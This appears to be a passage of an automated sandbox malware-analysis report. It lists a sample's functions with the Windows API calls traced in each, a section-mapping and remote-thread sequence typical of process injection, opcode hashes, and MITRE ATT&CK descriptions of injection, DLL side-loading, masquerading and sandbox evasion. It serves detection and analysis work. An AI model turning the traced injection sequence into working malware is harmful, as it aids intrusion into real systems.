NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

Function 02C3003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C3024D

Strings

cess, xrefs: 02C3018D
kernel32.dll, xrefs: 02C3008F, 02C30095

Memory Dump Source

Source File: 00000009.00000002.2771062212.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2c30000_ajvrjra.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: fd138f845daf221564a553f87e6ae7a9839ede97e432baf425e83feb7a45334c
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 14527975A00229DFDB65CF58C984BACBBB1BF09304F1484D9E90DAB351DB30AA85CF14

Function 00415910 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B19CE8), ref: 004159EF
GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 00415A2C
VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 00415A4B

Strings

, xrefs: 00415955

Memory Dump Source

Source File: 00000009.00000002.2767929246.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_ajvrjra.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
Instruction ID: 9f4e34dfc4b6fe9394a1db25d0a6d7b53828682d58b9ddec5cea0b2bad73ce3c
Opcode Fuzzy Hash: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
Instruction Fuzzy Hash: 3D3167149487C0CAE301CB78F8547823FA2EB25744F44847CD189873A5EFBA1524D7EE

Function 02CCA443 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02CCA46B
Module32First.KERNEL32(00000000,00000224), ref: 02CCA48B

Memory Dump Source

Source File: 00000009.00000002.2771494482.0000000002CC7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02CC7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cc7000_ajvrjra.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 3153ae8b347552a4feb437a50f2fcbfa1f1b1b3120ce8560f3b4d4ce29baa041
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C1F0F032200318AFE7207FF9AC8DB6E73EDAF88224F20152CEA42D10C0CB70E9054A61

Function 02C30E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02C30223,?,?), ref: 02C30E19
SetErrorMode.KERNELBASE(00000000,?,?,02C30223,?,?), ref: 02C30E1E

Memory Dump Source

Source File: 00000009.00000002.2771062212.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2c30000_ajvrjra.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 620753ad965f63d69eadd59c880b602f741d140fbda77ca14c4d9ac3ebe426c0
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 3DD01232245228B7DB013A94DC09BCEBB5CDF09BA6F008421FB0DE9080CBB09A4046EA

Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F

Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B

Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F

Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F

Function 02CCA102 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02CCA153

Memory Dump Source

Source File: 00000009.00000002.2771494482.0000000002CC7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02CC7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cc7000_ajvrjra.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 3b8a756be9b067538a4195b95129d8ba7bfe2830013775093411b33ce0546933
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: DB113C79A00208FFDB01DF98C989E98BBF5AF08351F1580A4F9489B361D371EA50EF80

Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B

Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000009.00000002.2767782736.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ajvrjra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B

Function 004158E0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B19CE4,00415F7B), ref: 004158E8

Memory Dump Source

Source File: 00000009.00000002.2767929246.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_ajvrjra.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
Instruction ID: d7b87d211da148203f6924bb85ac0980f9e485e76abd759aca5fb629b3ee17cc
Opcode Fuzzy Hash: edc34b9f6b4820ea05e34d55aad0c07fdf7bc1d6d5b6794533697c47ab2511c9
Instruction Fuzzy Hash: D3B092B0DC46409BD7008BA0A814B513AA4E308742F404461F505C2180DA2014208F14

Non-executed Functions

Function 00415AE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00415B11
WritePrivateProfileStringA.KERNEL32(00418384,0041835C,00418330,0041830C), ref: 00415B35
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B3D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415B7D
GetComputerNameW.KERNEL32(?,?), ref: 00415B91
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415B9F
OpenJobObjectA.KERNEL32(00000000,00000000,004183B4), ref: 00415BAE
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415BBF

Strings

-, xrefs: 00415BCC

Memory Dump Source

Source File: 00000009.00000002.2767929246.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_ajvrjra.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: b7bb9a5b8577f05c9444bb152fbeed06ee10d6e36786bb58eab085b6d1570c50
Instruction ID: c8ce66b9030aa5128248987ed1e6c42ca1346a4c7388fc80dbaa79af2878fbf1
Opcode Fuzzy Hash: b7bb9a5b8577f05c9444bb152fbeed06ee10d6e36786bb58eab085b6d1570c50
Instruction Fuzzy Hash: E721FB31A88348EBD7209F94DD85FDD7B70FB4CB51F1440A9F649AA1C0CAB42AC48B5D

Function 00415C00 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415C34
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415C4F
HeapDestroy.KERNEL32(00000000), ref: 00415C6E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415C76

Memory Dump Source

Source File: 00000009.00000002.2767929246.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_ajvrjra.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 40611bbb9540bf7089aa309a5be8a53c8ce5539108cd5addca110bf7d1443001
Instruction ID: dfb90add5c3ca1356a5d467ff049daf0d79d45e69348a2a8c246a34d756d5ef6
Opcode Fuzzy Hash: 40611bbb9540bf7089aa309a5be8a53c8ce5539108cd5addca110bf7d1443001
Instruction Fuzzy Hash: F901A770A84604DBD750EBB4ED457DA77B8FB0C746F404076F60AD7280DA7419548B96

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

